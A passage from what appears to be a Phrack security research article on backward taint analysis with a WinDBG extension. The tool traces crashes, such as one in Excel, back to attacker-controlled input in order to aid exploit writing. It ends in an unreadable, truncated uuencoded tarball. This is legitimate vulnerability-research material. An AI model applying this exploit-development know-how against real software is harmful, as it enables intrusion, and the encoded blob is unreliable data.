A location is defined as:

	- A memory address and size

	- A register name (for the implementation a register is considered 
	  entirely, not making differences regarding %eax and %al for 
	  example). This means that, when defining a register, I set 
	  it higher (e.g: setting %al as tainted will also taint %eax) 
          and clearing will clear it lower.  Care must be taken, since
	  when defining %al, %ah is not set. 

To keep track over bit operations in a register, it is important to taint 
the code-block level of a control flow graph [5].  This adds extra 
complexity, since there is the flow graph and the data flow dependencies 
graph.  The dependencies graph represents the influence of a source data
to the operation been performed.

In the implementation provided with this article, the WinDBG extension will
normalize the operations, saving the used values for later inspection by 
the GUI application.  This provides a great view over the tainted data.


---[ 2.1.1 - Taint Sources

Any information that is considered untrusted is tainted.

Untrusted, for the scope of this article, is the information considered in
control of the attacker.  There is also a transitive relation when dealing
with tainted data, where any untainted data that receives values from tainted 
source, becomes tainted. 

This includes information received from the network, or readed from the 
disk (in case of client-side exploits, for example).

The more tainted information, the bigger the propagation and the required
resources in order to keep track of that.  In fuzzing situations, where
taint data is used to feedback the program behavior, even server-side
configurations can be marked as tainted (in order to avoid the need to test
server software with multiple different configurations [22]).

Tainted information is just deleted when it receives an assignment from an
untainted source or and assignment from a taint source resulting in a constant
value not controlled by the attacker.  Most instructions in a program will not
untaint the data, thus usually the number of tainted data grows during the
program analysis.

The example above is an explicit flow, since the defined value will receive
the used tainted value independently of any conditions.

When there are conditions for the flow, this is called an implicit flow,
like in the following example:

	if (x == 1) y=0;

As I'll analyze in section 2.2, conditional statements needs a special analysis
approach, and in the offered tool this is done in the analysis part 
(the WinDBG extension). 

Two special situations to track are partial tainting (when the untrusted 
source doesn't completely control the tainted data) and tainting merge 
(when there are two different untrusted sources being used to derive some
data).  In a merge, the result is tainted. 

A data area is 'used' when it is referenced by an operation and is
'defined' when the data is modified.  

Instructions that are pure assignments are easy to track, since if a 
tainted location is used to define another location, this new location will
also be tainted.

Operations over strings are tainted when:

	- They are used to calculate string sizes using a tainted location
		E.g:  a = strlen(tainted(string));

		Since string is tainted, I assume the attacker also controls
		the value of a.  

	- Search for some specific char using a tainted location, defining
	  a flag if found or not found. 

		E.g.:	pointer = strchr(tainted(string), some_char);
	
			if (pointer) flag=1;

		Since the string is tainted, I assume the attacker also 
		partially controls the flag.  The same happens if the
		attacker controls the some_char value.
				
Arithmetical instructions with at least one used tainted data usually 
define tainted results, since the attacker at least partially controls the 
result.  
Those instructions can be simplified using intermediate languages to map to
boolean operations, and then the following rules applies:

Or truth table:
 
X	Y	X or Y	   
0	0	0	   
0	1	1	   
1	0	1	   
1	1	1	


And truth table:
 
X	Y	X and Y	   
0	0	0	   
0	1	0	   
1	0	0	   
1	1	1	 

Xor truth table:
 
X	Y	X xor Y	   
0	0	0	   
0	1	1	   
1	0	1	   
1	1	0	 

Assuming there is at least one used tainted data:

	- In the situation where I have an or operand, if the used 
	  untainted data is 1, I know that I don't define the result of the
  	  operation, so I untaint the result.  If it is 0, I know that 
	  whatever value I define for the tainted data, the same value will
	  be defined for the used target of the operation, meaning that the
	  result is tainted.

	- When I have the and operation, on the other side, if the used 
	  untainted data register is 0, I know that I can't define the 
	  result, and hence I untaint the data.  If the used untainted data
	  is 1, I completely define the result, so it is tainted.

	- XORs have a special situation where the value is XORed with 
	  itself. This is the only case where an used tainted data will 
	  define an untainted result (0).

It is also a good idea to keep track of the EFLAGS register when the 
attacker is able to define the value, considering it tainted (this is later
used to determine the influence over flow operations).

Conditional branches are taken care of in the implementation using the 
tracing analysis generated by the WinDBG plugin. Single-stepping is used for
the tracing.  WinDBG provides the disassembled opcode for the current 
instruction and it is parsed to keep track of the tainted data.

To solve a limitation of the tool, which is to consider cases not created 
by the original crash data, one must analyze conditional jumps and flag 
registers carefully:

	- If the attacker can define the EFLAGS, and a jump is dependent of
	  a flag, the attacker controls the branch decision (this is 
	  considered by !exploitable as unknown, since creates lots of 
	  different possibilities - simply controlling EIP is not enough to
	  define exploitability, since some control over the memory 
	  location pointed by the EIP is also a requirement).  Ret-into-lib
	  depends of the controls over the arguments and ROP approaches requires
	  multiple return control to create all the required gadgets.

	- control over a branch decision means tainted EIP, since the 
	  attacker at least partially controls the flow of execution

	- To consider the value of EIP, one must define:
		* The address if the jump is taken
		* The address of the next instruction (if the jump is not 
	     	  taken)
		* The value of the interesting flag register (0 or 1)
		* Then:  %eip<-(address of the next instruction) +  value 
		  of the flag register * (|address if the jump is taken - 
		  address of the next instruction|)

The above formula permits to extend the functionality to expand the taint 
over code flow blocks, solving the actual limitation of defining if a 
specific code block is under attacker control (instead of a specific 
destination with the actual input that generates the crash), but also 
exponentially grow the complexity of keeping track.  

Researchers are creative and as so there are many other uses for taint
analysis like identify how long sensitive data is kept in the system [6] 
and/or formally define a secure information flow [7].


---[ 2.1.2 - Intermediate Languages and Tainted Sources

In order to keep track of the tainted sources and propagate the taint, it
is critical to have a program analysis that will understand the target
program language semantics.

Tools exist to implement taint analysis in high-level languages, such as
C++ and Java [7][8][9], but this article focuses on straight assembly code 
analysis.  I also recommend reading about symbolic execution [9][10] and 
SAT Solvers [11][12][13] since this has a close relation with the subject.

The classic approach is to use an intermediate language to represent the
program instructions.  This improves the code quality and helps in
portability.

There are many good references in that area, so I'm just going to recommend
some [14][15][16] and say that I use the WinDBG api directly, which is not
the best approach while thinking in portability, but was the fastest to 
code. 

The WinDBG extensions are DLLs loaded by the debugger using LoadLibrary and 
run in the context of the debugger process.  Those extensions are trusted
by the debugger.  The debugger tries to handle access violations, but heap
corruptions in the extension itself will likely crash the debugger.

All the debugger extensions can make calls to the Win32 API and to the
debugger interfaces (dbgeng.dll).

What is more interesting is the fact that the debugger API will try to
abstract the type/version of the target, which means you can write
extensions that will work on a live debugging session or in a dump file
equally.  The same applies for user-mode/kernel-mode targets.

The two main types of extensions API for WinDBG are:
	- WdbgExts -> Old debugger extension interfaces has many
limitations for symbol and type lookups 
	- DbgEng -> It is the new debugger interface, which the attached
project is based on.  Offers interface for everything that can be performed
by the debugger

DbgEng extension API is exposed through the dbgeng.dll and offers the
capability to create new standalone tools that call the interface.  Some of
the functionalities supported:
	- Get current thread/process information
	- Read/Write memory
	- Symbol/type lookup

To call the extension functions, one need to first created the debug
interface objects and then call the interface exposed by these objects.

A extension using the DbgEng must export the DebugExtensionInitialize entry
point, and optionally export the DebugExtensionNotify and
DebugExtensionUninitialize entry points.

As previously explained, the debugger will LoadLibrary() the extension dll
and then will use the GetProcAddress() to find the entry point.

From the attached code:
	HRESULT
	CALLBACK
	DebugExtensionInitialize(
		OUT PULONG Version,
		OUT PULONG Flags
	)

This is the mandatory entry point which will be called when the extension
is loaded.  This function get new debugger interfaces by calling in the
code:
	if ((Hr = DebugCreate(__uuidof(IDebugClient)),
				(void **)&DebugClient)) != S_OK)
	...
	
	if ((Hr = DebugClient->QueryInterface(__uuidof(IDebugControl),
				(void **)&DebugControl)) != S_OK)

The optional: 
	void
	DebugExtensionNotify(
		OUT ULONG Notify,
		OUT ULONG64 Argument
	)

Is called then the target is connected/disconnected and is not used in the
code.  The DebugExtensionUninitialize is called when the extension is
unloaded and can perform cleanup routines.

In the attached code:
	HRESULT
	CALLBACK
	vdt_trace(PDEBUG_CLIENT Client, PCSTR args)

Is the debugger extension (called from the debugger using !vdt_trace).  The
args is the command line argument string passed to the extension.

The API is very rich in getting process information and I strongly
recommend the reader to have a look into the source code at this point.


---[ 2.1.3 - Explosion of Watched Data

Anybody who has worked with taint propagation knows that the biggest 
problem is how to keep track of all the data.

In this case, I need at least to:

	- Identify all the instructions and their operands
	- Define what are the source, destination and other impacted
	  registers (some projects don't keep track of affected registers,
	  like the comparision flags in EFLAGS [6])
	- Mark all the tainted data
	- Understand what each instruction does

It is easy to see that keeping track over all the information is quite
performance-intensive, even more when decisions need to be made and
followed.

There are implicit and explicit operands for instructions, and it is
necessary to support all the situations (otherwise, the track over some 
important tainted data is lost).

A good example [5] is a simple push %eax operation:
	
	- Explicit operand: %eax register
	- Implicit operands: %esp and ss
	- Semantic:  %esp<-%esp-4	(substraction)
		     ss:[%esp]<-%eax	(move)

As explained, this is treated by the intermediate language. I need to keep
track of the base memory areas, their size and the register names (keeping
bitwise information - as opposed of byte-level [21] - is better to avoid false
positives, but is prone to easily explode the amount of data collected).

Boolean operations have a special treatment as well, since some boolean
operations will provide different results when they are performed with the
same data (or with fixed values), like a XOR of the same tainted data will
give back untainted information (and with 0 is the same, and so on...), as 
explained before.

Instructions over strings also needs to be tainted (many integer overflows 
happens from calculations of data sizes).  The cases of tainting operations
over strings have been explained in the section 2.1.1.

Tainted data will remain for long time, also increasing the explosion
problem (to delete the tracking over a data, it is required that this data
receives an uncontrolled value, or is deallocated somehow).

During the tracing step (explained later) the instructions complexity are
simplified in order to speed-up the analysis process. 

Due to all the challenges faced by the taint analysis and to the lack of
detailed information about source data for specific file-formats and protocols,
and thus the difficulties in creating working exploits for such cases, I
decided to use a different approach.  Such approach is very useful when you 
already have a reproducible crash case and is named Backward Taint Analysis.

---[ 2.2 - Backward Taint Analysis

Backward Taint Analysis is a reverse approach to the natural taint analysis
flow.  Basically, instead of getting all the input, mark it as tainted and 
track it during the program execution, what I do is to get the crash,
validate what is of interest (which led to the application crash) and trace
back to see if it comes from input and, if so, what modifications were
performed.

This avoids the explosion of tainted data, since most of the input is
considered not tainted (and usually it is legitimate).

To do so, the process is divided in two parts:

	- A trace from a good state to the crash (incrementally dumped to a
	  file) -> Gather substantial information about the target 
	  application when it receives the input data, which is formally 
	  named 'analysis'
	- Analysis of the trace file -> Formally defined as 'verification' 
	  step, where the conclusive analysis is done

The trace step stores some useful information, like effective addresses and
data values (later used to determine what is been copied to where and how
it is been affected). Note that:

	- This is done using a WinDBG extension
	- It only supports the basic x86 instructions (so, no MMX and SSE).
	This limits the analysis in many cases and requires extension on
	the supported instructions.  The project is been open-sourced here,
	so I expect to receive patches.
	- Simplification of the instructions to make the next step softer

To provide the simplification it is necessary to deal with many specifics, 
like in the instruction:

	- CMPXCHG r/m32, r32 -> 'Compare EAX with r/m32. If equal, ZF is 
	                         set and  r32 is loaded into r/m32. 
				 Else, clear ZF and load r/m32 into 
				 AL' [17]

Such an instruction creates the need for conditional taints, since 
by controlling %eax and r32 the attacker controls r/m32 too.

Alternative taints are also provided, in the form of srcdep{1,2,3}.

Since the trace step generates a file to be loaded by the next step, this
file will contain:

	- Mnemonic of the instruction
	- Operands
	- Dependences for the source operand

Dependences for an operand are for example, elements of an indirectly
addressed memory.  This will create a tree of the dataflow, with a root in
the crash instruction.

The analysis step receives the address ranges that have the attacker data 
and then does the automatic analysis to determine the control over anything
you want to know.

	- This is done by a standalone tool (it is in the same project
	  file), and has a GUI!

Since the dataflow is available in a tree rooted in the crash instruction,
the analysis step will just search in this tree, using a BFS [18]
algorithm.

Let's now look at some example code:

	1-) mov edi, 0x1234       ; dst=edi, src=0x1234
	2-) mov eax, [0xABCD]     ; dst=eax, src=ptr 0xABCD
       	              		  ; Note 0xABCD is evil addr
	3-) lea ebx, [eax+ecx*8]  ; dst=ebx, src=eax, srcdep1=ecx
	4-) mov [edi], ebx   	  ; dst=ptr 0x1234, src=ebx
	5-) mov esi, [edi]   	  ; dst=esi, src=ptr 0x1234, srcdep1=edi
	6-) mov edx, [esi]   	  ; Crash!!!

The tree will look like:

	6-) Where does [esi] come from?
	5-) [edi] is moved to esi, where edi comes from and what does exist
	    in [edi]?
	4-) [edi] receives ebx and edi is defined in 1-) from a fixed value
	3-) ebx comes from a lea instruction that uses eax and ecx
	2-) eax receives a value controlled by the attacker
	... ecx is out of the scope here :)



---[ 2.2.1 - From the crash to the exploit

In order to compile the provided project, I use Microsoft Visual Studio 
2008 for the GUI and the command line for the debugger extension (don't 
forget to install the debugger extension SDK [19]).

To compile the applications, go to the sources directory and open the 
Project in Visual Studio.

The GUI is compiled using the project build, the dll is compiled through 
the command line:

	- Open the DOS prompt
	- Execute:

	  Cmd.exe /k C:\WinDDK\7600.16385.0\bin\setenv.bat 	\
	  C:\WinDDK\7600.16385.0\ chk WNET

	- Then go to the directory VDT-Tracer and execute:

		setpaths.cmd

	- On some systems you will need to open the makefile file (just 
	  open and close):

		edit makefile

	- Then, just compile:

		bcz

	- Copy the library from bin\i386\vdt-tracer.dll
	  to your WinDBG extensions directory 


Attached to the article there is an Excel file for a problem discovered by 
accident two years ago (the problem was discovered during a Forensic 
Analysis by a friend of mine, who after recovering an Excel Spreadsheet 
noticed that Excel was crashing when trying to open it).  
The name of the file is FIL573.XLS.

The problem was fixed more than a year ago, but it is useful to illustrate
the steps taken in order to use this project.  As mentioned, I'm not going 
to discuss the analysis step, but I'll just show how to get the tool to
work... the rest is up to you!  

First, open excel, and attach to it using WinDBG [Figure 
WinDBG_Attaching_to_Excel].  Add a breakpoint in the CreateFile [Figure 
WinDBG_Breakpoint_CreateFile].

Start the tracing process [Figure WinDBG_Trace_VDT].

Open the crash file withing Excel [Figure Opening_Crash_File_Excel].  

Using an hex editor (in my case I used the xvi32) open the file and try to 
locate a string that you can search in the program's memory, to determine 
where the file was loaded [Figure Finding_User_Input_in_Memory].

Using the searching capabilities of WinDBG, locate such string in the 
program's memory [Figure WinDBG_Finding_User_Input_in_Memory].

Open the trace file in the GUI [Figure VDT_Open_Trace_File] and add a taint
range like in [Figure VDT_Add_Taint_Range] and 
[Figure VDT_Add_Taint_Range2].

Now everything is ready, and you will have the taint analysis of the 
instructions you are interested of, related to the range of memory you just
specified.  

Click with the right button in any instruction [Figure VDT_Check_Taint_Of],
see the Check Taint Of option [Figure VDT_Check_Taint_Of2].  It is going to
offer the taint information for all applicable operands 
[VDT_Check_Taint_Of3].


------[ 3 - Existent solutions and comparisions


Microsoft Research released the !exploitable [3] extension for Microsoft 
Debugger and its source code.  This is a great initiative and contributed a
lot for the growing number of cooperation between researchers and the 
software industry (since now the vendors can at least classify the 
exploitability of each reported vulnerability).  Although it fails in many
cases to classify the exploitability, it provides a good
extensibility support and is a good start point in this initiative.  
It is important to note as well that a good aim of the tool is to identify
unique bugs, eliminating duplicated issues.

A simple example of the problem of such approach is:

_declspec(naked) int main() {
	_asm {
		mov eax, 0x41414141
		call eax
	}
}

This is incorrectly classified as EXPLOITABLE because the tool always
assumes that the attacker has control over all the input operands
[Figure bangexploitablefp.jpg].
This is not the case in the example.  The provided solution in
this article differs from that, since instead of trying to classify the
exploitability, I try to save researcher time while analyzing
vulnerabilities and determining exactly that limitation:  Are the input
operands in control of the attacker?

So, to resume, bang exploitable (!exploitable) objectives are:

	- Classify unique issues (crashs appearing through different code
	  paths, machines involved in testing, and in multiple different 
	  test cases)
	- Quickly prioritize issues (since crashes appear in thousands,
	  while analysis capabilities are VERY limited)
	- Grouping the crashes for analysis

And the provided tool objective is:

	- Helping you to create the exploit code :)

Piotr Bania released a paper about an architecture for similar analysis, 
providing more advanced cases called Spiderpig [20].  The Spiderpig project
is not available for testing, making it impossible to create a fair comparision.
In Piotr's paper, he explains the Virtual Code Integration (or Dynamic Binary 
Rewriting) approach.  Some of the techniques used in the 'intermediate 
language representation' phases are also adopted in the provided tool, in a 
different way (there is no intermediate language, but a normalized output 
of the execution trace).  Spiderpig has ways to solve specific conflicts 
in partially controlled data, creating what he named a disputable object. 
In those objects, parent objects are also available for analysis.
After reviewing the provided algorithms in the article Spiderpig seems to be 
much more advanced than the provided tool, but as said, is not available.

Taint Check [21] is dependent of DynamicRIO or Valgrind and is an extension
to provide taint analysis in order to detect overflow conditions in tested 
software.  It does not help in the exploit-creation phase, neither to 
determine the actual exploitability of an issue.  It is divided in the 
taint-seed, taint-tracker and taint-assert, with the purpose of defining 
original tainted values (values comming from the network for example), 
track the propagation and alert about security violations respectively.
Because they provide a solution for security-tests I decided to also 
include a heap-monitoring example tool with this article.  This tool aims 
at solving the challenge of heap tests for embedded Linux architectures 
using ARM (much less advanced then the Valgrind Memcheck plugin,
altought the only option for ARM as far as the author is aware).

The solution provided here started when I first faced the problem of 
exploiting a complex client-side vulnerability, involving a very complex 
(and at that time closed) file format.  It was later expanded when I saw 
the results of attacking scenarios against Word [1] and started to think 
how to automate the analysis in order to determine the exploitability.

My initial version was integrated with a fuzzer to provide internal 
information and feed back the fuzzer in order to have better coverage of
the critical parts of the software [22]. It was unix based and
later ported to cover Solaris too, in order to exploit two vulnerabilities 
released by Secunia [23] in the same software where RISE Security found a 
vulnerability some months before.

Because a good friend of mine was doing research in the same area, and had
good experience with the Microsoft Debugger, we decided to integrate our
implementations and create the final version provided here.  I keep 
expanding this version since then and using in my work and personal 
projects.

The biggest difference here is that we provide the backward Taint Analysis 
in order to help the exploitation process, which means we focus in 
determining what the attacker controls from the crash back to the input 
data.


------[ 4 - Future and other uses

I can't foresee the future.  I hope that more researchers are going to
contribute with the project, helping it to grow and achieve maturity.

The code needs immediate support for extended coverage of x86 instructions,
speed enhancements, introduction of heuristical detection over user input 
(so you don't need to manually specify the memory ranges to watch).

I'm sure many other uses are possible, and for sure I do expect some 
extensions to come.

The original idea was based on Valgrind and REX intermediate language.  The
available version is based on Microsoft Debugger (but really tight to it 
due to the limited amount of time to create the project).  

A limitation of such approach is the fact that you need the PoC to trace
the execution until the crash, and then to analyzed it backwards.  If your
PoC is not taking a specific execution path that gives you control over some
specific memory areas, the analysis will say you don't control such memory
areas.  The tool does not try to find other ways to get control over areas
that you need, it only provides you the information if you control or not
such areas based on the executed PoC.

There are other areas of interest, like heap viewing [24].  A
heap view example for linux arm is also available with the article and 
future versions on Sourceforge [25].

Also, the integration with fuzzers [22]
is an interesting approach to provide better ways to find security
vulnerabilities.


------[ 5 - Acknowledgments
A lot of people helped me in the long way for these researches that 
resulted in something interesting (at least to me) to be published, you all
know who you are.

The biggest thanks goes to Julio Auto, for helping me with the tools and 
for having the motivation to go present alone [26] while I was still 
fighting to get permissions to release everything in my personal name.

Special tks to the Phrack Staff for the great review of the article, giving  
a lot of important insights about how to better structure it and giving a 
real value to it.

I'll never ever forget to say thanks to my research team and friends at
RISE Security (http://www.risesecurity.org) for always keeping me motivated
studying completely new things.   

Conference organizers who invited me to talk about Software Exploitation, 
even after many people already talked about the subject they trusted that my 
talk was not more of the same. 

It's impossible to not say thanks to COSEINC, an amazing place for hackers  
to work and which provided me lots of motivation to keep my projects going  
on my free time.

A big thanks goes to Check Point Software Technologies, for paying me to 
keep doing my hobby ;)


------[ 6 - References
[1] Nagy, Ben. "Finding Microsoft Vulnerabilities by Fuzzing Binary. Files 
with Ruby - A New Fuzzing Framework"; 
Syscan 2009

[2] Miller, Charlie. "Babysitting an Army of Monkeys: An analysis of fuzzing 
4 products with 5 lines of Python"; Cansecwest 2010
http://securityevaluators.com/files/slides/cmiller_CSW_2010.ppt

[3] Microsoft !exploitable page
http://msecdbg.codeplex.com

[4] Abouchaev, Adel; Hasse, Damian; Lambert, Scott; Wroblewski, Greg. 
"Analyze crashes to find security vulnerabilities in your apps"

[5] Barbosa, Edgar. "Taint Analysis"; H2HC 2009
http://www.h2hc.com.br/repositorio/2009/Edgar.pdf

[6] Chow, Jin. "Understanding data lifetime via whole system emulation";
Usenix 2004

[7] Denning, Dorothy; Denning, Peter. "Certification of Programs for Secure 
Information Flow"

[8] Klee Project
http://keeda.stanford.edu/wiki/klee-install

[9] Godefroid, Patrice; Levin, Michael; Molnar, David. "Automated Whitebox 
Fuzz Testing"
http://research.microsoft.com/en-us/projects/atg/ndss2008.pdf

[10] Molnar, David; Wagner, David. "Catchconv: Symbolic execution and  
run-time type inference for integer conversion errors"

[11] Wille, Andre; Drechsler, Daniel. "Evaluation of SAT like Proof 
Techniques for Formal Verification of Word Level Circuits

[12] de Moura, Leonardo; Bjorner, Nikolaj. "Z3: An Efficient SMT Solver"

[13] Z3 Project - Microsoft Research
http://research.microsoft.com/en-us/um/redmond/projects/z3/

[14] ERESI Project
http://www.eresi-project.org/

[15] Valgrind Project
http://www.valgrind.org

[16] Porst, Sebastian. "Applications of the Reverse Engineering Language 
REIL"
http://www.h2hc.com.br/repositorio/2009/Sebastian.pdf

[17] Intel Manual 
http://www.intel.com/software/products/documentation/vlin/mergedprojects/analyzer_ec/mergedprojects/reference_olh/mergedProjects/instructions/instruct32_hh/vc42.htm

[18] BFS algorithm
http://en.wikipedia.org/wiki/Breadth-first_search

[19] Microsoft Debugger SDK
http://www.microsoft.com/whdc/devtools/debugging/default.mspx

[20] Bania, Piotr.  "Dynamic Data Flow Analysis via Virtual Code 
Integration (aka The SpiderPig case)"
http://piotrbania.com/all/spiderpig/pbania-spiderpig2008.pdf

[21] Newsome, James; Song, Dawn. "Dynamic Taint Analysis for Automatic 
Detection, Analysis, and Signature Generation of Exploits on Commodity
Software"
http://valgrind.org/docs/newsome2005.pdf

[22] Branco, Rodrigo. "Letting your fuzzer know about target's internals"
http://www.troopers10.org

[23] Secunia Advisory SA32473. "Sun Solaris Sadmin Two Vulnerabilities"
http://secunia.com/advisories/32473/

[24] Core Security Technologies. "Heap Draw / Heap Tracer"
http://oss.coresecurity.com/projects/heapdraw.html

[25] JFree Project
http://www.sf.net/projects/jfree

[26] Auto, Julio. "Triaging Bugs with Dynamic
Dataflow Analysis" .Source Barcelona 2009
www.julioauto.com/presentations/sourcebcn09_TBwDDA.ppt


------[ 7 - Sources [vdt_jfree.tgz]

---------------------------------------------------------------------------
Attached to the article there is:
	- VDT Project:  The main project cited in the article, it is a 
Microsoft Debugger extension and a GUI used to analyze crash files in order 
to create an exploit code
	- Jfree project:  It is a Linux-ARM Heap Monitoring System created 
long ago and also available at [25]
	- Images directory:  Some screenshots of the program and plugin of 
the VDT Project.

Further updates will be available in the RISE Security website at:
	http://www.risesecurity.org

For the author's public key:
	http://www.kernelhacking.com/rodrigo/docs/public.txt

begin 644 vdt_jfree.tgz
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
